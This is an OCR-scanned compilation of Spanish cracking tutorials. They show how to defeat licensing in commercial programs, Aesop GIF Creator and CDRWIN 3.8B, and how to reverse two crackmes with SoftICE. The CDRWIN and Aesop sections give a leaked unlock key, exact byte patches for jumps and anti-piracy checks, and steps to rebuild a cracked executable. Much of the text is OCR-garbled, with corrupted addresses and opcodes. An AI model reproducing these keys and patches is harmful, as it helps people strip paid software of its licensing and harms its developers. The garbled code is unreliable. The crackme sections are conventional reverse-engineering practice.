>decrementa edx, lo que one el 
>registro a 0 

>¿hemos llegado al final? ¡sí! 


¡no! 


>aquí se salta al final de la 
>rutina 


0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177 
0177: 


004 
004 
004 
004 
004 
004 
004 
004 
004 
004 
004 
004 
004 
004 
004 
004 


04105 
04107 
04109 
0410a 
0410c 
0410e 
04110 
04112 
04115 
04118 
041la 
0411c 
0411e 
0411f 
04120 
04121 


sub eax, edx 
jmp 0040411e 
pop edx 

cmp cl,bl 
jnz 0040411e 
cmp ch, bh 
jnz 0040411e 
shr ecx,10 
shr ebx,10 
cmp cl,bl 
jnz 0040411e 
cmp ch,bh 
pop edi 

pop esi 

pop ebx 

ret 


bueno, no quiero aburrir más al lector con tanto código. sólo decirle que, tanto si el unlock key introducido es 
el correcto como si es el erróneo, al final llegaremos a éste trozo de código: 


0177: 
0177: 
0177: 
0177: 
0177: 
0177: 


0177: 
0177: 


0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 


004951b5 
004951ba 
004951bc 
004951be 
00495104 
004951c9 


004 
004 


004 
004 
004 
004 
004 
004 
004 
004 
004 
004 


951d0 
951d2 


951d9 
951db 
951dc 
951dd 
951de 
95lel 
951le6 
95blec 
951f£1 
951f6 


call 00404080 

jnz 004951d2 

xor edx,edx 

mov eax, [ebx+00000478] 

Call 0043ebb4 

mov byte ptr [ebx+0007fb71],fb >pone el valor 'fb' 
>en ésa posición de 
>memoria para indicar 
>que el unlock key es 
>el correcto 

jmp 004951d9 

mov byte ptr [ebx+0007fb71],00 >y pone el valor '00' 
>para indicar que es 
>erróneo 

xor eax,eax 

pop edx 

pop ecx 

pop ecx 

mov fs: [eax],edx 

push 004951fe 

lea eax, lebp-010c] 

mov edx,00000003 

call 00403d14 

ret 


si ahora retornamos al primer trozo de código veremos que, efectivamente después de la rutina que realiza 
todas las comprobaciones nos encontramos con la comprobación final: 


0177: 
0177: 
0177: 
OLITE 


0048d4e5 
0048d4ea 
0048d4ef 
0048d4f1 


call 00495124 

mov eax, [00498654] >nuestra rutina 

mov eax, [eax] 

cmp byte ptr [eax+0007fb71],fb >¿unlock key 
>correcto? 


bueno, si el lector ha seguido éste tutorial desde el principio podrá fácilmente deducir que la subcadena con la 
que nos hemos topado se corresponde exactamente con el unlock key correcto. recordemos aquí una vez más 
nuestra subcadena: "mrpntl". 


puede el lector en éste punto, por consiguiente, probar dicho unlock key para comprobar si el programa se 
registra. abrimos el aesop gif creator version 1.00.215 y nos desplazamos al menú 'help' y seleccionamos la 
opción 'registration'. en la ventana 'register me!' introducimos 'mrpntl' en el campo 'unlock key". 
inmediatamente se nos mostrará ésta ventana: 


Gi) Application has been successfully registered! 


si ahora seleccionamos la opción 'about' del menú 'help' veremos que el inicial 'unregistered' ha sido 


sustituido por el valor que tengamos en la clave 'registeredowner' que se localiza en: 
'hkey_local_machinelsoftwareWmicrosoftYwindowslXcurrentversion' 


en el registro de windows. 


una última cuestión. tal vez el lector se esté preguntando: ¿de dónde demonios sale ése unlock key? bien, es 
una pregunta que nosotros también nos hacemos, pero ¡vamos a intentar darle una respuesta! 


comoquiera que en el proceso de registro no se nos exige en ningún momento que introduzcamos un name o 
nada similar, y teniendo en cuenta que el 'id' que nos proporciona el programa al instalarse es siempre el 
mismo (con lo cual podemos afirmar que éste 'id' no influirá en el registro), podemos deducir que o bien el 
unlock key está 'hardcoded' en el propio código del programa, o bien usa algún otro método. como lo más 
fácil (y lo más probable) es que se trate de la primera de las posibilidades, vamos a empezar por ahí. 


para éllo haremos un 'dead list' de nuestro ejecutable ("aesop.exe"). arrancamos w32dasm y 
desensamblamos el programa. si alparceamos un poco por las 'string data references' nos encontraremos con 
una extraña cadena que, casualmente, es la misma con la que nos tropezamos mientras tracéabamos la 
rutina con el softice ("mtxmrpntltl"). esto es lo que nos muestra w32dasm: 


* possible stringdata ref from code obj ->"mtxmrpntl1t1" 


:00495193 b810524900 mov eax, 00495210 
:00495198 eBdbeff6ff call 00404178 
:0049519d 8b85f4feffff mov eax, dword ptr [ebp+fffffef4] 


:004951a3 8d95f8fefffft lea edx, dword ptr [ebp+fffffef8] 


bueno, creo que ya todo está claro: no merece la pena seguir. parecía, en principio, bastante complicado y ha 
resultado más simple de lo que pensaba. 


me gustaría saludar a mis crackers favoritos y de los que más he aprendido. 


son éstos: tornOdo, the sandman, blackb, +fravia, tnt!, ecd, karpof, wkt. esto no quiere decir que no haya otros 
extraordinarios crackers. 


nota: si le gusta el programa, cómprelo. los programadores pierden demasiado tiempo desarrollando su software como para 
que vengamos nosotros y no les compensemos por su trabajo. ¡no es justo! 


ensayo por: megabite 
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Programa: CDRWIN -— CDROM Recording Tools - 3.8B 


PROTECCION: Múltiples comprobaciones de los códigos de desbloqueo. 


Descripcion: Software de copia para CD-R. Versión de Julio del 2000. 


DL 


DOWNLOAD: http://www.goldenhawk.com 


Herramientas: Softlce 3.24, Procdump32, Papel y algo para escribir. 
CRACKER : Arkanian FECHA: 19/10/2000 


| INTRODUCCION 


vamos a ver como saltar las múltiples comprobaciones que realiza este programa tanto en el momento en el 
que intentamos registrarnos como en el inicio del mismo. la protección esta basada en una serie de 
comparaciones seguidas de saltos condicionales, vamos a intentar hacerle creer que somos usuarios "legales" 
del mismo. 


creo que el aviso que nos da la ventana de registro: 'this program is heavily protected against piracy" solo 
esta justificado en la parte del "heavily". ¡es una larga y ardua tarea trazar todo el código donde se realizan 
las comprobaciones!. pero con un poco de paciencia, papel y lápiz, podremos hacer el programa plenamente 
funcional. 


al atake 


previamente haremos una copia en otro lugar de nuestro hd del ejecutable cdrwin.exe. después de esto empezamos. 


para desbloquear el programa, se nos van a pedir varias cosas, name, company / e-mail, un unlock key y un check key, por 
supuesto no disponemos de las dos últimas, de momento... 


rellenamos los datos con lo de siempre, hacemos un ctrl+d, nos vamos a softice, asignamos las ventanas y empezamos 
con la parte seria: 


comando : s 30:0 Ifffffffff "arkanian" 
respuesta: pattern found at 0030:8075e5f2 
comando : s 

respuesta: pattern found at 0030:c0f5ac80 


ok, solo uno y por encima del 80000000, el otro parece un eco de la busqueda, de momento todo bien: 


comando : bpr 30:38075e5f2 30:5075e5f2+8 rw 


queremos que se interrumpa la ejecución del programa cuando lea o escriba en la dirección donde está nuestro nombre. 
lo del +8 es porque el nombre tiene 8 caracteres y queremos abarcar todo el rango de memoria que ocupa. 


seguimos, ctrl+d, click en el botón de unlock y sofice salta en kernel!hmemepy, £12 hasta salir al código real del 
programa en cdrwin!.text+0005a7b debajo de un call [user32!getwindowtexta], limpiamos el breakpoint y de ahí £10 hasta 
aquí: 


:00419dfa e8576c0400 call 00460456 -> venimos de aquí, donde almacena el nombre. 
:00419dff 8d4de4 lea ecx, dword ptr [ebp-1c] -> aterrizamos aquí. 

:00419e02 51 push ecx 

:00419€e03 8b4e60 mov ecx, dword ptr [esi+60] 

:00419e06 eS4b6c0400 call 00460456 ->almacena el nombre de la compañía / e-mail. 
:00419e0b 8b4e64 mov ecx, dword ptr [esi+64] 

:00419e0e 8d55e8 lea edx, dword ptr [ebp-18] 

:00419e11 52 push edx 

:00419e12 eS3£6c0400 call 00460456 -> guarda el unlock key. 

:00419e17 8b4e68 mov ecx, dword ptr [esi+68] 

:00419e1a 8d45ec lea eax, dword ptr [ebp-14] 

:00419e1d 50 push eax 

:00419e1e eS336c0400 call 00460456 -> guarda el check key. 

:00419e23 8d4dbc lea ecx, dword ptr [ebp-44] 


| 

:00419e36 6848604900 push 004960a8 

:00419e3b 52 push edx 

:00419e3c e8d8400300 call 0044df19 -> manipula el unlock key. 
:00419e41 830418 add esp, 00000018 -> corrige la pila. 
:00419e44 83£804 cmp eax, 00000004 -> la comparación... 
:00419e47 018597000000 jne 00419ee4 -> nos manda fuera. 


:00419e60 6828604900 push 00496048 

:00419€65 51 push ecx 

:00419€e66 eSae400300 call 0044df19 -> manipula el check key. 
:00419e6b 83c418 add esp, 00000018 -> corrige la pila. 
:00419e6e 831804 cmp eax, 00000004 -> esta otra comparación... 
:00419e71 7571 jne 00419ee4 -> nos manda fuera. 


¡un alto en el camino 


| A es 
| después de haber trazado el código entrando en todas las llamadas y tomado abundantes notas, llegamos a las 
siguientes conclusiones: 


e tanto el valor de name como el de company son guardados en al menos dos localizaciones 
diferentes de memoria. 

e el primer caracter de todos los datos introducidos se guarda también aparte. 

e en call 0044df19 nuestros unlock key y check key de prueba son encriptados mediante una serie 
consecutiva de xor's y almacenados en al menos dos localizaciones diferentes de memoria antes 
de su manipulación. 

e cualquier otra cosa diferente de 4 en eax después del retorno de la llamada nos manda a la ventana 
de "bad key format". 


cuanto trabajo, total con invertir los saltos... 


primera aproximacion 


84x 85,74 x 75 
cambiamos los dos saltos de arriba por dos jz , un ctrl+d para salir y aquí es cuando empiezan las sorpresas. 
softice no nos deja salir y muestra este sorprendente mensaje: 

break due to windows requested breakpoint. 


aterrizamos debajo de un call [kernel32!raiseexception] en la dirección 44e788, a partir de aquí empiezan los problemas, 
cualquier intento para salir con crtl+d nos deja en esta dirección y forzando con el comando exit nos lleva directamente 
al pantallazo azul del windows y si trazamos un poco para ver donde nos lleva la cosa acabamos en un terrorífico bucle 
donde eax empieza a 00000000 e intenta llegar a ff£fff38, aquí si que podemos salir con un ctrl+d. sólo para ver un 
estupendo mensaje de ''abnormal program termination'' por parte del runtime c++ etc...cuando intentamos entrar de 
nuevo en el programa, este ni siquiera se inicia, salta el softice en esa dirección de raiseexception y volvemos a estar 
en las mismas. 


solución... ¿"nopear” la llamada?. la machacamos con 90's, salimos de softice y obtenemos una maravillosa ventana de 
"this software is now unlocked and fully functionaly"". 


¿ya esta?, ...pues no, un nuevo inicio del programa nos muestra una enorme ventana, de título pirated copy detected, 
que nos recrimina, en una larga parrafada de tono muy correcto, (aparte de llamarnos ladrones), todo lo que estamos 
haciendo. cualquier intento de capturar esta ventana con los bp's adecuados en el inicio del programa, está condenado 
al fracaso. el programa se enfrasca en un tremendo bucle con multitud de llamadas y saltos y al final lo dejas hastiado 
y aburrido. un reinicio del ordenador y una nueva entrada en el programa nos muestra una ventana con un mensaje de 
"error: authorization file data is corrupt / invalid". 


hemos perdido el primer set. 


segunda aproximacion 


(registrar el programa) 


volvemos de nuevo a la carga. desinstalar e instalar el programa de nuevo lleva menos de cinco minutos. vamos a ver 
que hace el programa después del segundo salto. 


| 84 x 85, 74 x 75 y call 0041f3d0 


poco después del segundo salto entramos en esta llamada y aquí encontramos más comparaciones y saltos 
| E: pS . 
| condicionales. veamos un pequeño ejemplo: 


* referenced by a call at address: 
1:00419e86 


:0041f3d0 8b4c2410 mov ecx, dword ptr [esp+10] 
:0041£3d4 53 push ebx 

:0041£3d5 55 push ebp 

:0041£3d6 56 push esi 

:0041f3d7 8b742418 mov esi, dword ptr [esp+18] 
:0041£3db 8b19 mov ebx, dword ptr [ecx] 
:0041£3dd 57 push edi 

:0041f3de 8b3e mov edi, dword ptr [esi] 
:0041f3e0 8b4604 mov eax, dword ptr [esi+04] 
:0041f3e3 8bd7 mov edx, edi 

:0041f3e5 33d0 xor edx, eax 

:0041£3e7 3bda cmp ebx, edx -> primera comparación. 
:0041£3e9 7525 ¡ne 00411410 -> saltamos... 


* referenced by a (u)nconditional or (c)onditional jump at addresses: 
|:0041f3e9(c), :0041f3f7(c), :0041f405(c) -> ¡tres veces! 


| 
:0041£410 6400 push 00000000 -> aquí. 


:0041f412 6200 push 00000000 

:0041f414 6200 push 00000000 

:0041f416 6838ffffff push ffffff38 -> ¡mira lo que hay aquí! 

:0041f41b e850330000 call 00422770 -> por aquí aterrizamos en kernel32!raiseexception. 
:0041f420 830410 add esp, 00000010 


los parametros y valores de los registros antes de la comparación son los valores encriptados que el programa ha 
obtenido mediante la manipulación de nuestros códigos de prueba en el call 0044df19. las comparaciones y los saltos 
condicionales se suceden uno detras de otro. 


como puedes ver en ejemplo anterior, el salto a 0041f410 aparece en tres lugares diferentes. y esto es sólo el principio, 
existen varios saltos más a direcciones diferentes, pero, como regla general (casi) todos llevan a tres push 00000000 (o 
push eax), una instrucción push ffffffxx (donde xx es por orden de aparición 38, 37, 34, y 35). y van seguidos de un call 
00422770. así que con un poco de paciencia, papel y lápiz, obtenemos esta tabla: 


e datos a cambiar durante el proceso de registro: 


[dirección | instrucción [| valorhex [| cambiara 
| :00419e47 | jnz.00419ce4 | 0£85 0f 84 
| :00419e71 | jnz 00419ee4 7571 7471 
| :0041f3e9 | ¿nz.0041f410 75 25 74 25 
| :004113f7 | jnz 0041f410 7517 74 17 
| :0041f405 | jnz 0041f410 | 75 09 74 09 
| :0041f40e | jz 00411423 | 7413 75 13 
| :0041f438 jnz 0041f44a | 75 10 74 10 
| :0041f45c | jle 00411476 | 7e 13 7d 13 
| :00420083 (1) jz 004200b9 | 74 34 75 34 


(1) la excepción que confirma la regla. 


trazamos un rato más sólo por comprobar que no queda nada, salimos de softice y volvemos a tener la estupenda 
ventana de '...unlocked and fully functional”. 


ganamos el segundo set y empatamos el partido. 


segunda aproximacion 


(inicio del programa) 


espero que hayas tomado las oportunas notas de todo lo que has cambiado porque hasta aquí es sólo la mitad del 
trabajo. 


cuando ejecutamos el programa, este, vuelve a realizar el mismo proceso, con el mismo código pero en direcciones 
diferentes y como lo que encuentra como códigos de desbloqueo no le cuadra nos manda el mensajito de '...corrupt 
file". 


vamonos al loader de softice. 


symbol loader 


después de algunas pruebas en plan ensayo-error, vamos cercando nuestra presa. en call 0041£1e0 volvemos a encontrar 
saltos condicionales seguidos de la secuencia de instrucciones push ffffffxx (donde xx es ahora 33, 36, etc..).¡más 
trabajo!. 


atención ahora, esto es importante, hay una última comprobación con otro salto condicional en 4035e1, que si no lo 
parcheamos, nos manda al enorme bucle del primer intento y a la ventana de pirated copy detected. esta es la tabla 
con los cambios a realizar: 


e datos a cambiar durante el inicio del programa: 


dirección instrucción valor hex | cambiar a 
:00411353 jnz 00411365 | 7510 | 7410 
| :00411384 jle 00411399 7e 13 | 7d 13 


| :004035c1(1) | jnz.00403605 75 42 | 74 42 


(1) este es el más jodido de encontrar. 


salimos de softice y ¡ya tenemos el programa entero!, observarás que el botón que lleva a la ventana de registro ha 
desaparecido. pulsando con el botón derecho del ratón sobre la esquina superior izquierda (sobre el icono) y eligiendo 
del menú que aparece la opción about, veremos el programa adecuadamente registrado a nuestro nombre. 


ahora, ¿cómo trasladar todos estos cambios?, ...¿a pedales con un editor hexadecimal?, es una opción. pero es posible 
que si lo hacemos así, aparte de ser largo y trabajoso, nos tengamos que enfrentar a otras medidas de seguridad. mucho 
más rápido y sencillo es usar procdump32. así que sin cerrar edrwin abrimos procdump. 


procdump32 


seleccionamos en el cuadro task la línea cAcdrwin31cdrwin.exe, le damos al botón derecho y seleccionamos process 
infos, de ahí a sections, seleccionamos .text, con el boton derecho de nuevo elegimos save section to disk y le 
llamamos, por ejemplo, edr.bin. 


nos vamos al botón pe editor, buscamos la copia que hemos realizado previamente de cdrwin.exe, vamos a sections, 
seleccionamos .text y con el botón derecho a load section from disk, buscamos cdr.bin le decimos que ok y luego en 
apply changes method marcamos la opción to pe file, ok de nuevo y ya tenemos nuestro programa totalmente 
funcional. 


cerramos procdump y edrwin. sólo queda ir al directorio cdrwin3, renombrar el "viejo" cdrwin.exe (por si acaso), 
trasladar nuestro flamante cdrwin.exe, comprobar que funciona correctamente y borrar el "viejo". 


juego, set y partido. 


sobre la ventana "pirated copy detected" 


no quisiera acabar este ensayo sin hacer algunos comentarios sobre el texto de la citada ventana. es más, solo voy a 
decir cuatro cosas: 


1. los usuarios, desde vuestro punto de vista, son necesarios porque pagan y punto. así que no me 
vengais con historias raras. 

2. nadie os está robando nada, si este tipo de software es puesto a nuestra disposición durante 30 
días y luego, como decís, ''no question asked'' sobre para qué va a ser utilizado, copias ilegales 
de cd's supongo, no se a que vienen las quejas. solo lo he utilizado por y para los fines que he 
creido convenientes. 

3. "nadie espera que tú trabajes gratis'', cierto, ahí estoy de acuerdo. acabamos de demostrar que 
la afirmación "heavily protected' es pura fachada y para ello hemos invertido muchas horas de 
duro trabajo. cualquier detalle por vuestra parte en forma de talón al portador será bien recibido ;- 


) 
4. ¡hala!, a kaskarla.... 


hasta otra.. 
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El amado Softice 
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INTRODUCCION 


saludos amigos!. nos vemos una vez más con otro tutorial. esta vez, de un crackme nuevito. se trata del 
crackme 1 del amigo karpoff. realmente, aunque no es ni muy fácil ni muy difícil de crackear, su protección es 
mucho mejor que la de algunos programas. ya verán cuanto tendremos que tracear. con este manual parecerá fácil 
pero sin ayuda muchos estarían despistados. vamos a crackear!. 


antes que nada analizamos el crackme con el file inspector o cualquier analizador de archivos. vemos que no está 
encryptado ni empaketado con algo por lo que las cosas se nos van haciendo fáciles. lo ejecutamos y seleccionamos la opción 
para registrarnos. mi serial será 123456. ponemos registrar y no sale ningún mensaje de error, solo se borra el texto que 
introducimos. esto nos dice una cosa, que la única alternativa que nos queda es usar hmemcpy. [ctrl +d], bpx hmemcpy y f5 
para salir del sice. pulsamos registrar y estamos en el sice. 


como siempre estamos en las dlls. pulsamos f12 12 veces o f12 7 veces y luego f10 hasta que terminen todos los ret y 


aparecemos aquí: 


:00442b10 8b86dc020000 mov eax, dword ptr [esi+000002dc] 
:00442b16 e8alf8faff call 004223bc 


:00442b1b 8b86dc020000 mov eax, dword ptr [esi+000002dc]<----- aquí aparecemos 


:00442b21 8b10 mov edx, dword ptr [eax] 
:00442b23 f£f92b0000000 call dword ptr [edx+000000b0] 
:00442b29 8b55£8 mov edx, dword ptr [ebp-08] 
:00442b2c 8b45fc mov eax, dword ptr [ebp-04] 


:00442b2f e85c4dfoff 
:00442b34 8bd8 
:00442b36 837dfc00 


call 00407890 Sorrranccacaame llama a la rutina de comprobación 
mov ebx, eax 
cmp dword ptr [ebp-04], 00000000 


:00442b3a 7448 Jz 00442084 Sornnnnnnaccao- que esto no los despiste!!! 
:00442b3c 85db test €ebx, ebx rn compara si el flag z es O 
:00442b3e 7536 jnz 00442D7 6 rana esta es una zona muy interesante 
:00442b40 33d2 xor edx, edx 

:00442b42 8b86dc020000 mov eax, dword ptr [esi+000002dc] 

:00442b48 e887f7fdff call 004222d4 

:00442b4d 33d2 xor edx, edx 

:00442b4f 8b86e0020000 mov eax, dword ptr [esi+000002e0] 


hasta aquí vamos bien. no se despisten con el primer jz ya que no nos es importante. el segundo es el que define si nos 
vamos a registrar o no. ¿cómo sé que es el segundo y no el primero?. 


1) por que arriba hay un test ebx, ebx y esto compara si el flag es O 
2) por que podemos comprobarlo invirtiendo el flag con el comando del sice r fl z 


el salto va a algúna dirección de memoria. vamos a inspeccionar. para ir a determinada dirección de memoria en el sice 
debemos escribir y la dirección de memoria. en este caso escribiremos y 00442b76 que es la dirección a la que saltará si el 
flag es 1. después de llegar a 00442b76 pulsamos f10 más o menos 11 veces hasta llegar aquí: 


:00442b89 648910 mov dword ptr fs: [eax], edx 

:00442b8c 68a62b4400 push 00442ba6 

:00442b91 8d45f£8 lea eax, dword ptr [ebp-08] 

:00442b94 ba02000000 mov edx, 00000002 

:00442b99 e84e0dfc£f£ call 00403880 Grnnnnnnnnnnno-- aquí debemos pararnos 
:00442b9e c3 RN devuelve 1 si nos registramos 
:00442b9f e%bcO7fcff jmp 00403360 

:00442ba4 ebeb jmp 00442b91 

:00442ba6 5e pop esi 

:00442ba7 5b pop ebx 


mi instinto cracker me dice que esta zona es interesante, sobre todo por el ret después de la call. pero nuestro serial no 
está por aquí, tenemos que meternos en la call y buscar. nos paramos sobre la call y apretamos f8 para entrar. aparecemos 


aquí: 

:004038ea c3 ret 

:004038eb 90 nop 

:004038ec 53 push ebx 

:004038ed 56 push esi 

:004038ee 89%c3 mov ebx, eax 

:004038f0 89d6 mov esi, edx 

:004038f£2 8b13 mov edx, [ebx] 

:004038f4 85d2 test edx, edx oro tenemos que pararnos aquí 
:004038f6 74la jz 00403912 Errrncnnnnannncnnnnnannmes si es cero, registrado!!! 
:004038f8 c70300000000 mov dword ptr [ebx], 00000000 

:004038fe 8b4af8 mov ecx, dword ptr [edx-08] 

:00403901 49 dec ecx 


para pararnos sobre la comparación le damos a f10 7 veces luego de entrar en la call. vemos el valor de los registros hasta 


uff que costó descubrir el camino, pero ahora ya terminamos. espero que practiquen mucho más. si quieren muchas víctimas 
bájense esto. creo que trae 27 programas víctimas y sus protecciones son muy inferiores a la de este crackme. felicitaciones 


karpoff!. saludos a todos y nos vemos en mi próximo manual!, 


astalavista 


página oficial del grupo k-for:_ http: //pagina.de/kfor 
mi dirección de e-mail: dek ointHhotmail.com 
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introduccion 


antes de leer esto, tened en cuenta de que está hecho por un principiante y para principiantes. 
por eso la mayoría de las explicaciones estarán de sobra para muchos. como siempre, intento explicar las 
cosas como me hubiese gustado que me las explicaran a mí. 


al atake 
echando un vistazo 


al ejecutar crakpad.exe aparece un mensaje. cerramos la ventanita y pasamos a softice (ctrl+d) para poner un 
breakpoint en la api que nos ha mostrado el mensaje. tecleamos bpx messageboxa. salimos de softice (f5) y 
ejecutamos de nuevo crakpad.exe. aparecemos de nuevo en softice. tras pulsar f12 aparece de nuevo el mensaje. 
hacemos clic en el botón del mensaje y volvemos a softice. ahora estamos en la siguiente instrucción, tras la llamada a 
esa api. (00406294). examinando el código (ctrl+flecha arriba/abajo) vemos que poco más arriba hay otra api 
interesante: getlocaltime. ponemos un bpx en esa línea (:00406237), quitamos el bpx messageboxa y salimos de 
softice (£5). 

primer contratiempo: el bpx en la línea del getlocaltime no hace que softice salte al ejecutar el crakpad. creo que esto 
se debe a que al estar el archivo comprimido, no reconoce las direcciones que aparecen al término de la 
descompresión. cambio de enfoque. abrimos el exe con el loader de softice y ponemos un bpx getlocaltime y dejamos 
correr (f5)... bien! esta vez sí: se detiene la ejecución por la interrupción que provoca getlocaltime. f12 y aparecemos 
en el código de crakpad en la línea siguiente a la llamada a esa api. la idea ahora es ver qué pasa si evitamos los efectos 
de esta api. 

justo tras la llamada hay una comparación y un par de saltos condicionales y más abajo otro incondicional que lleva a 
00401000, precedido de un popad. ¿os suena esto? es el salto al punto de entrada original (oep) del bloc de notas. 
quitamos el bpx getlocaltime. pulsamos a y enter para editar la línea en que se ha detenido la ejecución. aparece la 
dirección a la izquierda y escribimos ¡mp 0040100. enter dos veces (una para hacer efectivos los cambios y la 


segunda para salir del modo edición) y f5 para dejar correr el programa. ya está: se abre el bloc, rebautizado para la 
ocasión como crakpad. ya sabemos cómo burlar la protección temporal de este crackme. ahora hace falta implementar 
un patch para perpetuar ese cambio. 

r!sc dice explícitamente que no se pueden usar cargadores para romper esta protección. la alternativa es inyectar 
código. la pregunta del millón es dónde. sabido es que los compresores suelen borrar y sobreescribir secciones 
mientras se activan las rutinas de descompresión. para que las modificaciones que hará nuestro patch no sean alteradas 
luego por las rutinas de descompresión, lo ideal es que el salto al injerto se produzca cuando el exe esté completamente 
descomprimido y desplegado en memoria. lo mejor para eso es hallar la última instrucción de las rutinas de 
descompresión, es decir, la que salta al punto de entrada del programa comprimido. en ese caso, lo que se hace es 
redirigir el salto al injerto de código para que este modifique el código del ejecutable. la última instrucción del injerto 
es un salto que vuelve al punto de entrada para que el programa se ejecute, ahora ya con los cambios que hemos 
codificado desde el injerto. 

la siguiente tarea es, por tanto, determinar el final de la rutina de descompresión para saltar desde ahí a una zona donde 
podamos escribir el parche, volver y que siga ejecutándose el programa, pero con el parche hecho. 


una compresión poco comprensible 


usando utilidades como gettyp a veces se descubre con qué empaquetador se ha comprimido el programa. también se 
puede abrir el exe en un editor hexadecimal y mirar en las primeras líneas por si viene el nombre del compresor. así 
mismo se puede recurrir a un editor de cabeceras pe, que muestran los nombres de las secciones (en ocasiones una de 
ellas lleva el nombre del compresor). 

los intentos al respecto no dieron resultados positivos. parece que r!sc se ha ocupado de borrar las huellas: la última 
sección de la cabecera carece de nombre. 

el proceso de descompresión manual resulta bastante desalentador. a diferencia de otros compresores que he visto, este 
no termina sus rutinas de descompresión con un salto al punto de entrada. tras muchas pruebas llegué a la conclusión 
de que tras 5 o 6 repeticiones de un bucle se llega al punto de entrada desde una instrucción movsb !!! que lo que se 
supone que hace es copiar bytes de una cadena en esi a edi. vamos a tomar la instrucción movsb como punto final de 
la rutina de descompresión, sin saber qué pasa de ahí en adelante, ni cuál es el nuevo punto de entrada. pero, al 
menos, tratemos de hallar por dónde pasa. 

en softice repetimos el bpx getlocaltime y f5. cuando se detiene, f12 para volver al código del programa y estamos en 
la instrucción siguiente a la llamada a la api getlocaltime. miramos el código por encima de la api (ctrl + flecha arriba) 
y no tiene buena pinta. tecleamos d eip para verlo en la ventana de datos y usamos alt+flecha arriba/abajo para 
desplazarnos por ella. aquí sí que se ven más cosas en la parte derecha de la ventana, que muestra los valores en ascii. 
poco más arriba de la dirección de la llamada (00406237) vemos cadenas de datos (la dirección electrónica de r!sc, 
etc). más abajo también se ven otras cadenas que aparecen en los mensajes del crackme. parece que entre estas dos 
zonas r!sc ha colocado la porción de código que nos ocupa. softice no muestra esa distinción entre datos y código, e 
interpreta (como numega le dió a entender) todos los bytes como instrucciones de código ejecutable. por eso, lo que 
aparece por encima da la llamada a la api en la ventana de código no tiene mucho sentido. a partir de la llamada, sin 
embargo, es bastante claro. si os fijáis, la cadena risc notme.com termina en 0040632f. desde ahí hasta 00406237 
(call getlocaltime) hay unos cuantos octales que softice agrupa en dos instrucciones sin sentido aparente: 60 bf y 
2062400057. si domináis el assembly, (cosa que todo el mundo recomienda para progresar rápidamente en esto de las 
desprotecciones) ya os habréis dado cuenta de lo que pasa. 

con hiew abrimos el crackpad.exe. no vamos a esa dirección porque no está en el archivo comprimido, antes de que 
sea cargado en memoria y, además, porque no importa. en cualquier punto, eso sí en modo decode (f4), pulsamos f3 
para entrar al modo de edición y tecleamos el primer octal (60h) y hiew salta a la linea siguiente. seguimos 
tecleando los octales (bf a0 62 40 00 57). en la siguiente linea agrupa los cinco siguientes y salta a la linea de abajo 
para escribir el que falta (57). el resultado es 


60 pushad 
bfa0624000 mov edi, 004062a0 
57 push edi 


¡hiew interpreta los códigos octales de modo inteligente! ahora ya tiene sentido. la api getlocaltime precisa un solo 
argumento, que es la dirección donde guardar los datos que devuelve (año, mes, día de la semana, etc). ya tenemos más 
claro cómo funciona el esquema de protección: al terminar de descomprimirse el archivo se salta (muy probablemente) 
a 00406230, que es donde comienzan las instrucciones de la protección. 


buscar un lugar para el injerto 


cuando se puede determinar exactamente cuál es la última instrucción de la rutina de descompresión, basta con 


comprobar que el punto al que se saltará para escribir el injerto ya se haya desplegado en la memoria, porque el 
programa ya no lo machacará. pero con este compresor el problema es más complejo: al estar el punto desde donde 
vamos a saltar en un bucle que se ejecuta varias veces, es necesario que el lugar a donde salte este “ahí”, presente 
desde el primer momento, y no sea sobreescrito o borrado por las rutinas de descompresión. también tiene que 
continuar en su lugar una vez descomprimido todo el programa (mi duda sobre la última vuelta del bucle). 

en primer lugar, miramos con hiew (f4 para modo hex) las zonas “libres” (con varios ceros seguidos) (se necesitan 20 
bytes de espacio para codificar el injerto) del archivo comprimido. hay tres o cuatro lugares: dos bastante amplios y un 
par de huecos más pequeños. a continuación comprobamos si esas zonas permanecen inalteradas a lo largo del proceso 
de descompresión. en softice ponemos un bpx en 0040c0f5, que es donde termina el bucle. tecleando d 

“dirección elegida'' se puede ir viendo en la ventana de datos si se ven afectadas en la descompresión. 

la mitad de las zonas no nos sirve. como no son muchos los bytes a escribir, optamos por una pequeñita: 0040880b; 
queda como más íntimo... 


escribir el injerto 


el siguiente paso es escribir las instrucciones necesarias. para hallar los “octales” hay que ir a softice y usar el comando 
“a” porque el programa está comprimido y, en frió, con un editor hexadecimal no se pueden calcular correctamente los 
desplazamientos (offsets) de los saltos. 

(con el término “octal” me refiero a las parejas de valores hexadecimales con que se codifican las instrucciones. más 


abajo se ve, por ejemplo, que el código octal de “push 00” es “6a 00”). 


17) el salto desde el final del bucle a la ubicación del injerto. 

lanzamos de nuevo crakpad.exe desde el loader de softice. bpx en 0040c0f5 y f5... al detenerse la ejecución se ve que 
esta es una instrucción de un solo octal. necesitamos 5 para codificar el jmp. el salto lo vamos a poner por encima de la 
misteriosa 0040c0f5  a4 movsb para que al volver del injerto esta sea la última instrucción que se ejecute. 
retrocedemos un poco en el código... bien, vamos a poner el salto tres instrucciones más arriba porque entre las tres 
suman 5 octales: 

0040c0f0 6200  pushad 

0040c0f2  32d2  xor dl, dl 

0040c0f4  4b dec ebx 

0040c0f5 as movsb 

ahora tecleamos a 0040c0f0 y enter para escribir esa instrucción. aparece la dirección y escribimos 

0040c0f0 jmp 0040880b (enter dos veces) 

en la ventana de código de softice aparece el correspondiente código octal que precede a cada instrucción. 

0040c0f0 e916c7ffff ¡mp  0040880b 

hay que anotar el código octal tanto de las 3 instrucciones que vamos a eliminar, como del salto para editar luego en 
frío con hiew el archivo. además, hay apuntar las tres primeras instrucciones para escribirlas en el injerto. (si imprimes 
este tut puedes ahorrate el trabajo) 

ahora quitamos el bpx 0040c0f5 y ponemos otro en 0040c0f0. f5 para que el bucle dé otra vuelta. 

softice para en el salto que hemos creado. pulsamos f10 para que nos lleve a la ubicación elegida para el injerto. 


2”) el mini-injerto 

estamos en 0040880b y solo se ven parejas de ceros que softice intenta reconocer como código ejecutable (0000 ad 
[eax], al). lo primero que hay que hacer es restaurar el código que nos hemos cargado antes, al escribir el salto que nos 
ha traído hasta aquí. tecleamos a eip (con este comando se edita la línea donde se ha detenido la ejecución) y enter 
para escribir la instrucción, y tecleamos las tres instrucciones seguidas cada una de un enter: 

0040880b push 00 

0040880c  xor dl, dl 

0040880e dec ebx 

